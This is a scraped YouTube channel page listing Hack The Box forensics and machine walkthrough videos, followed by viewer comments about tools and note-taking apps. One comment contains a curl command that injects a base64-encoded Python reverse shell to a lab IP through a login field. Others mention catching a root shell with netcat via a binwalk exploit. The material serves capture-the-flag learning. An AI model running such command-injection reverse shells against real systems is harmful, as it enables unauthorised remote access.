DivineTheClown (0xDTC)
DivineTheClown (0xDTC)
  • Видео 36
  • Просмотров 19 222
Reaper | Investigating Suspicious Logon Events | Hack The Box | Sherlocks
🚨 Our SIEM just threw a curveball-a suspicious logon event with mismatched IP addresses and workstation names! 🕵️‍♀️ Join me as we dive into network captures and event logs to unravel this cybersecurity mystery and report back to our SOC Manager.
🔎 Will we piece together the clues and find the culprit behind this anomaly? Watch as we correlate evidence, analyze data, and showcase essential skills for any aspiring cybersecurity professional!
🔥 Don't forget to like, share, and subscribe for more thrilling adventures in the world of hacking and cybersecurity!
Просмотров: 233

Видео

Campfire-2 | Forela Network Attack Investigation | Hack The Box | Sherlocks
Просмотров 1594 месяца назад
🚨 Forela's Network is under attack again! Our security system detected an old admin account requesting a ticket from the KDC on the domain controller. This account shouldn't be in use, raising suspicions of an AsREP roasting attack! Join me as I investigate this alert and uncover the truth behind it. 🔍 In this video, I delve into: Analyzing the suspicious KDC request Investigating potential AsR...
Campfire-1 | Kerberoasting Investigation | Hack The Box | Sherlocks
Просмотров 4364 месяца назад
Doc to read: techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797 🔍 Join me as we investigate a potential Kerberoasting attack in this exciting Sherlock activity on Hack The Box! Alonzo spotted some weird files on his computer, and it's up to our newly assembled SOC Team to get to the bottom of it. We'll ana...
Noted | Analyzing Extortion Attack | Hack The Box | Sherlocks
Просмотров 1524 месяца назад
🔍 Join me as I dive into a real-world DFIR (Digital Forensics and Incident Response) investigation! Simon, a developer at Forela, found a chilling note on his desktop claiming his system was hacked and sensitive data was stolen. The attackers are threatening to release it on the dark web! 🚨 With only Notepad artifacts in hand, our mission is to uncover how the attack happened and find a way to ...
Reason for not coming live 🤯🤯⚡️⚡️
Просмотров 635 месяцев назад
Reason for not coming live 🤯🤯⚡️⚡️
Logjammer | Windows Event Log Analysis for Junior DFIR Consultant Role | Hack The Box | Sherlocks
Просмотров 2366 месяцев назад
In this RUclips video, follow along as I walk through the steps to complete the Hack the Box CTF Challenge by exploiting two vulnerabilities. This solution is perfect for anyone who wants to test their skills in the world of ethical hacking while sharpening their problem-solving abilities. #SAUEasy #HTBEasy #CTFEasy #CyberSecurityEasy #PenTestingEasy #NetworkSecurityEasy #LinuxEasy #WindowsEasy...
Devvortex Hack The Box | Zip-File Symlink | SQLI | LFI | Privilege Escalation | Open Beta Season 3
Просмотров 1456 месяцев назад
🔐 Welcome to another Hack The Box walkthrough! Join us as we explore the "Zipping" machine, a medium-difficulty Linux box featuring a range of attack vectors. In this tutorial, we'll cover the entire process, from identifying a file upload vulnerability to achieving root access through privilege escalation. 🛠️ Topics Covered: 1. File Upload Exploitation: Discover a web application vulnerability...
Litter | Uncovering a Silent Threat: Investigating a Compromised Host | Hack The Box | Sherlocks
Просмотров 1407 месяцев назад
Litter | Uncovering a Silent Threat: Investigating a Compromised Host | Hack The Box | Sherlocks
Brutus | Unmasking Unix Auth Logs: The Brutus Challenge | Hack The Box | Sherlocks
Просмотров 1,6 тыс.7 месяцев назад
Brutus | Unmasking Unix Auth Logs: The Brutus Challenge | Hack The Box | Sherlocks
Unit42 | Uncovering Malicious Activity with Sysmon Logs | Hack The Box | Sherlocks
Просмотров 5607 месяцев назад
Unit42 | Uncovering Malicious Activity with Sysmon Logs | Hack The Box | Sherlocks
BFT | Unraveling and Mastering MFT Mysteries | Hack The Box | Sherlocks
Просмотров 9507 месяцев назад
BFT | Unraveling and Mastering MFT Mysteries | Hack The Box | Sherlocks
Codify Hack The Box | CVE-2023-37466(vm2) | MYSQL | Script-Logic-Compromise | Open Beta Season 3
Просмотров 967 месяцев назад
Codify Hack The Box | CVE-2023-37466(vm2) | MYSQL | Script-Logic-Compromise | Open Beta Season 3
Manager Hack The Box | Active Directory Certificate Services | MSSQL | Open Beta Season 3
Просмотров 2928 месяцев назад
Manager Hack The Box | Active Directory Certificate Services | MSSQL | Open Beta Season 3
Hyperfiletable | Forela's New Joiner Faces a Phishing Attempt | Hack The Box | Sherlocks
Просмотров 1189 месяцев назад
Hyperfiletable | Forela's New Joiner Faces a Phishing Attempt | Hack The Box | Sherlocks
Meerkat | Securing a Fast-Growing Startup: Analyzing PCAP and Log Data | Hack The Box | Sherlocks
Просмотров 7089 месяцев назад
Meerkat | Securing a Fast-Growing Startup: Analyzing PCAP and Log Data | Hack The Box | Sherlocks
Zipping Hack The Box | Zip-File Symlink | SQLI | LFI | Privilege Escalation | Open Beta Season 2
Просмотров 8110 месяцев назад
Zipping Hack The Box | Zip-File Symlink | SQLI | LFI | Privilege Escalation | Open Beta Season 2
Bumblebee | Forela Breach: External Contractor Steals Admin Credentials | Hack The Box | Sherlocks
Просмотров 62510 месяцев назад
Bumblebee | Forela Breach: External Contractor Steals Admin Credentials | Hack The Box | Sherlocks
OpTinselTrace-5 | Festive Cyber Chaos: Tinkertech Servers Hacked! 🎄🔒 | Hack The Box | Sherlocks
Просмотров 23910 месяцев назад
OpTinselTrace-5 | Festive Cyber Chaos: Tinkertech Servers Hacked! 🎄🔒 | Hack The Box | Sherlocks
OpTinselTrace-4 | Santa's Workshop Printers Under Attack! 🎅Packet Capture | Hack The Box | Sherlocks
Просмотров 7410 месяцев назад
OpTinselTrace-4 | Santa's Workshop Printers Under Attack! 🎅Packet Capture | Hack The Box | Sherlocks
OpTinselTrace-3 | Santa's Trouble: VPN File Leak, Network Breach! | Hack The Box | Sherlocks
Просмотров 8010 месяцев назад
OpTinselTrace-3 | Santa's Trouble: VPN File Leak, Network Breach! | Hack The Box | Sherlocks
Optinseltrace-2 | Unwrapping Santa's Tech Secrets | Hack The Box | Sherlocks
Просмотров 19510 месяцев назад
Optinseltrace-2 | Unwrapping Santa's Tech Secrets | Hack The Box | Sherlocks
OpTinselTrace-1 | Elfin's Suspicious Activity: Uncovering Santa's Insider | Hack The Box | Sherlocks
Просмотров 38310 месяцев назад
OpTinselTrace-1 | Elfin's Suspicious Activity: Uncovering Santa's Insider | Hack The Box | Sherlocks
PC Hack The Box | gRPC | SQL Injection | Pyload | CSRF | CVE-2023-0297
Просмотров 257Год назад
PC Hack The Box | gRPC | SQL Injection | Pyload | CSRF | CVE-2023-0297
Cozyhosting Hack The Box | Command Injection | Session | PostgreSQL | SSH | Open Beta Season 2
Просмотров 1,9 тыс.Год назад
Cozyhosting Hack The Box | Command Injection | Session | PostgreSQL | SSH | Open Beta Season 2
SandWorm Hack The Box | SSTI | Horizontal Privilege Escalation | Rust | FireJail| Open Beta Season 2
Просмотров 1,1 тыс.Год назад
SandWorm Hack The Box | SSTI | Horizontal Privilege Escalation | Rust | FireJail| Open Beta Season 2
Keeper Hack The Box | Common Credentials | KeePass | Data Dump | Puttygen | Open Beta Season 2
Просмотров 2,7 тыс.Год назад
Keeper Hack The Box | Common Credentials | KeePass | Data Dump | Puttygen | Open Beta Season 2
Pilgrimage Hack The Box | Upload LFI | BinWalk | Open Beta Season 2
Просмотров 583Год назад
Pilgrimage Hack The Box | Upload LFI | BinWalk | Open Beta Season 2
SAU Hack The Box | SSRF | OS Command Injection | Script | Open Beta Season 2
Просмотров 4,3 тыс.Год назад
SAU Hack The Box | SSRF | OS Command Injection | Script | Open Beta Season 2

Комментарии

  • @joe-hd3uv
    @joe-hd3uv Месяц назад

    You don’t have nearly enough views, these Sherlock walkthroughs are great, thanks!

    • @0xDTC
      @0xDTC Месяц назад

      Thanks bro 🥹 that's why I'm not uploading any videos it take efforts so I decided once I reach 500 subscription and people start meeting my like goals then I'll again start putting time in it.

  • @sonembesilbukucu172
    @sonembesilbukucu172 2 месяца назад

    Name of noting the app?

    • @0xDTC
      @0xDTC 2 месяца назад

      Obsidian the one i use

  • @tommykelly8920
    @tommykelly8920 3 месяца назад

    Thanks for the write-up. It was very clear and helpful!

    • @0xDTC
      @0xDTC Месяц назад

      ♥️

  • @lucypite
    @lucypite 3 месяца назад

    Can you tell me where the over 50 flows username install&password install come from

    • @0xDTC
      @0xDTC 3 месяца назад

      If you don’t mind please can you share or point out the video timestamp?

    • @lucypite
      @lucypite 3 месяца назад

      @@0xDTC of course sir about 17.09 after filter out login requests there are many login attempt seems invalid all of these requests username and password equal to install

    • @0xDTC
      @0xDTC 3 месяца назад

      @lucypite those are the failed attempts which must have been cause by the wordlist or by the application itself on the login service or might be trying different variation with defaults.

    • @lucypite
      @lucypite 3 месяца назад

      @@0xDTC got it love you so much

    • @0xDTC
      @0xDTC 3 месяца назад

      @lucypite 🫢☺️🤗

  • @lucypite
    @lucypite 3 месяца назад

    keep going man

  • @maheshbaskaran-pz9rc
    @maheshbaskaran-pz9rc 3 месяца назад

    Could you please tell us the note taking app name? Thanks

    • @0xDTC
      @0xDTC 3 месяца назад

      Obsidian sir

    • @maheshbaskaran-pz9rc
      @maheshbaskaran-pz9rc 3 месяца назад

      @@0xDTC Thank you for taking your time on explaining through video.

  • @imca_b_5517
    @imca_b_5517 4 месяца назад

    Share your LinkedIn profile i want to connect you

  • @abhishekupadhyay657
    @abhishekupadhyay657 4 месяца назад

    Thanks and keep the good work

    • @0xDTC
      @0xDTC 4 месяца назад

      🫡

  • @ayaan-dx9vo
    @ayaan-dx9vo 5 месяцев назад

    mujhe seekhna hai

    • @0xDTC
      @0xDTC 5 месяцев назад

      ♥️ Join upcoming lives hope will shed basic knowledge with advance.

  • @pwkgod
    @pwkgod 5 месяцев назад

    thanks for your video, i was a bit lost on how to use the tools

    • @0xDTC
      @0xDTC 5 месяцев назад

      The same happens with me now and then but my notes help me some times.

  • @vietanhle8311
    @vietanhle8311 5 месяцев назад

    What app are you using to take note and cheat sheet on video??

    • @0xDTC
      @0xDTC 5 месяцев назад

      Obsidian

  • @dsiisus
    @dsiisus 5 месяцев назад

    What application do you use to save your notes and screenshots and looks like the icon is Amethyst?

    • @0xDTC
      @0xDTC 5 месяцев назад

      Obsidian good sir

  • @kalidsherefuddin
    @kalidsherefuddin 6 месяцев назад

    Thanks for

    • @0xDTC
      @0xDTC 6 месяцев назад

      🤔

  • @kadi-yf9ol
    @kadi-yf9ol 6 месяцев назад

    Could you please share with us the resource to the list of all links tools?

    • @0xDTC
      @0xDTC 6 месяцев назад

      There are many researches who have built their own list and you will find that all those are similar so you can just Google for DFIR tools you will get a list of like many legs where you can get all kinds of tools.

  • @the7Cofficial
    @the7Cofficial 7 месяцев назад

    Broo im intrested your videos i need jingle bell

    • @0xDTC
      @0xDTC 7 месяцев назад

      Will upload when it retires can’t violate TOS of HTB even tho they don’t care about there own policy 😂😂😂

    • @the7Cofficial
      @the7Cofficial 7 месяцев назад

      @@0xDTC 🥲💊

  • @michaelanderton5948
    @michaelanderton5948 7 месяцев назад

    What file are you uploading to Hybrid Analysis at 41:17? I uploaded present.vbs but I do not have the options in the Falcon Sanbox Reports section.

    • @0xDTC
      @0xDTC 7 месяцев назад

      The file i got around 35:05 time stamp i guess don't remember have to check back on notes

  • @michaelanderton5948
    @michaelanderton5948 7 месяцев назад

    Great video!! What obsidian theme are you using? How do you do that task block?

    • @0xDTC
      @0xDTC 7 месяцев назад

      Thank you, and I'm not sure about the theme which one I'm using. But for the task block i believe you are referring to "callouts". If I'm not wrong.

  • @the7Cofficial
    @the7Cofficial 7 месяцев назад

    ❤need more sherlock video broo i need juggling and APTnightmare

  • @josephkimiri7982
    @josephkimiri7982 8 месяцев назад

    Well done. Can I get your obsidian notes?

    • @0xDTC
      @0xDTC 8 месяцев назад

      Will share someday it's still under development. 😋

  • @Malwr0316
    @Malwr0316 8 месяцев назад

    Please do "Hunter" challenge from Sherlocks

    • @0xDTC
      @0xDTC 8 месяцев назад

      I will be doing it and I have more then 3 or 4 videos pre recorded it's just i don't get time to edit or don't have an editor who can edit. But I'll try my best to provide it.

  • @mateimartin9234
    @mateimartin9234 Год назад

    Can i have your notes, please, the ones with nmap and so on

    • @0xDTC
      @0xDTC Год назад

      I know everyone wants my notes but it's still under development once it's half finished I'll make them public.

  • @dino43432
    @dino43432 Год назад

    Please more HTB videos so far following along in 3 videos all 3 worked for me

  • @LZMusic2
    @LZMusic2 Год назад

    nice work :) and if u can give the link of that dashboard of tools like when u get the command of postgres and thanks

    • @0xDTC
      @0xDTC Год назад

      That's still under construction 🚧 working on it's not complete once i complete it I'll make it public.👍🏾

  • @ExE.Nativo
    @ExE.Nativo Год назад

    nice dude!

  • @comicmania76
    @comicmania76 Год назад

    Thanks! It helped me a lot😁

    • @0xDTC
      @0xDTC Год назад

      Glad to hear that!

  • @johnny_sins-gamer
    @johnny_sins-gamer Год назад

    Hi bro Can Please share your obsidian database file please.....

    • @0xDTC
      @0xDTC Год назад

      Not sharing with anybody yet as it's still under progress I mean it's not fully complete yet.

    • @0xDTC
      @0xDTC Год назад

      But yes I'll share it once i complete it half.

  • @TheMachineWolf
    @TheMachineWolf Год назад

    Thank you so much... I must be an idiot, I could not figure out how to get the .kdbx off the freaking system, spent a good 2 hours trying never even thought to set a python server.

  • @dino43432
    @dino43432 Год назад

    Would like more HTB videos

    • @0xDTC
      @0xDTC Год назад

      Definitely sir😁 but from now on only retired boxes.

  • @floaberger
    @floaberger Год назад

    love your breakdowns. just started university for IT-security. and helps a lot

    • @0xDTC
      @0xDTC Год назад

      🕴️🎩 Thanks for compliment

  • @q_maxgames6045
    @q_maxgames6045 Год назад

    Hey, what's the name of the notebook you use at the beginning of the video

    • @0xDTC
      @0xDTC Год назад

      It's an Obsidian notes taking app where I keep/make my notes. 😊

  • @johnny_sins-gamer
    @johnny_sins-gamer Год назад

    Hi bro can share your command list which you have it look very clean and more of helpful

    • @0xDTC
      @0xDTC Год назад

      Not yet bro it's under construction 😋

  • @ZezoHagag-z6t
    @ZezoHagag-z6t Год назад

    Thank you I have a question What is the name of the panel through which you open all the URLs? from open urls

    • @0xDTC
      @0xDTC Год назад

      It's a browser extension "Open Multiple URLs" you can search for it in the extension Store

    • @ZezoHagag-z6t
      @ZezoHagag-z6t Год назад

      thanks @@0xDTC

  • @Jonathan-ng4vw
    @Jonathan-ng4vw Год назад

    can you share your obsidian database files by google link or any

    • @0xDTC
      @0xDTC Год назад

      Sorry not possible for now it is under progress

    • @Jonathan-ng4vw
      @Jonathan-ng4vw Год назад

      By the way, thanks for the walkthrough. I was just stuck and kept getting the "Username can't contain whitespace" error but after watching your walkthrough this issue resolved@@0xDTC

  • @aberbescu
    @aberbescu Год назад

    Not working for me, did all steps and when listening with netcat does not connect, monitored with pspy74 looks like the scripts does work but not connecting

    • @0xDTC
      @0xDTC Год назад

      What command did you use ? Please share that

    • @amboXD
      @amboXD Год назад

      same here bro got user flag on my own but couldnt get root because nc shell never binded

    • @amboXD
      @amboXD Год назад

      python3 exp.py ./image.png (my ip) 9001 and nc -lvnp 9001 then downloaded binwalk_exploit.png into shrunk through wget but nothing happens

    • @0xDTC
      @0xDTC Год назад

      You have to run 2 ssh connections to complete that 1st with ssh tunnel and 2nd ssh plain connection when we run binwalk exploit which will give us nc connection.

    • @amboXD
      @amboXD Год назад

      i did logged in as emily through ssh and downloaded the binwalk_exploit.png inside of the folder that is checked by the root malware scan process@@0xDTC

  • @bilalbahadur8956
    @bilalbahadur8956 Год назад

    not working ssh -i authorized_keys atlas@ip enter password showing

    • @0xDTC
      @0xDTC Год назад

      If the key doesn't have any password just press "Enter" when it asks for password

    • @bilalbahadur8956
      @bilalbahadur8956 Год назад

      @@0xDTC if i put password on a key and then enter the password when atlas logging then it work?

    • @0xDTC
      @0xDTC Год назад

      It should work. But like I said don't add a password on the key.

  • @serhdom3649
    @serhdom3649 Год назад

    Thanks for your tutorial, can you share your dashboards?

    • @0xDTC
      @0xDTC Год назад

      Dashboard?

    • @serhdom3649
      @serhdom3649 Год назад

      @@0xDTC 20:39

    • @serhdom3649
      @serhdom3649 Год назад

      I mean this@@0xDTC

    • @0xDTC
      @0xDTC Год назад

      Ok bro that's the whole database in obsidian 😅 and still under development. It will take 1 more year I guess to complete half.

    • @serhdom3649
      @serhdom3649 Год назад

      Too bad😁😅@@0xDTC

  • @Tarunsinghnoble
    @Tarunsinghnoble Год назад

    for me, on the basket page I created the "login" button is kind of disabled. When I hover over the login, the mouse icon doesn't change, unlike other links. When I run the script it says URL: Rejected: Bad hostname.... Please help

    • @0xDTC
      @0xDTC Год назад

      Did you configure the basket For local proxy?

    • @Tarunsinghnoble
      @Tarunsinghnoble Год назад

      @@0xDTC yes i selected all the options while creating it

    • @0xDTC
      @0xDTC Год назад

      So just tell me on which part of the video you are stuck.

  • @mohamedakramserrssif484
    @mohamedakramserrssif484 Год назад

    where is the user flag ?

    • @0xDTC
      @0xDTC Год назад

      On path /home/"user"/user.txt

  • @k4id095
    @k4id095 Год назад

    Hi, van you help me please? curl '10.10.11.xxx:55555/htb/login' -d 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjI0MSIsOTAwMSkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oInNoIikn|base64 -d|bash`' Login failed -> ¿?

    • @0xDTC
      @0xDTC Год назад

      Did it work ? Sorry i was busy didn't check the comment 😅

  • @anonymous-l4c
    @anonymous-l4c Год назад

    hey i have problem on port 55555 its not opening in browser . what to do ?

    • @0xDTC
      @0xDTC Год назад

      Is your VPN connected and Box is active ?

    • @anonymous-l4c
      @anonymous-l4c Год назад

      @@0xDTC yes also when i connect with router then its working but when i connect my computer with my mobile hotspot to access internet its not working 😶‍🌫️ i don't know why this happens. Note i uses kali linux gnome as main os not in virtual box

    • @0xDTC
      @0xDTC Год назад

      I also use Kali as a base but I never tried solving the box using my Smartphone internet as I have a good internet connection 😋. I hope your lan internet connection is also good

  • @0xDTC
    @0xDTC Год назад

    Guys do tell me which box or topic you want next video from me. I'm waiting.

    • @_cyb3rry
      @_cyb3rry Год назад

      Hi... please can you do one for "zipping"?

    • @0xDTC
      @0xDTC Год назад

      I already did but can't make it public it'll be out once it's retired. Because I recently got to know that if HBT found me that I am releasing the active box they might block my HTB account. Although I'll be releasing them if I get enough subscribers soon and my channel gets a membership option I will release the active machine also but only for members until then I can't do anything I don't want to ban my account on HTB. Sorry 🙇😔

    • @topeagle2002
      @topeagle2002 Год назад

      Sniper seasonal box

    • @0xDTC
      @0xDTC Год назад

      Sorry sir but i can't.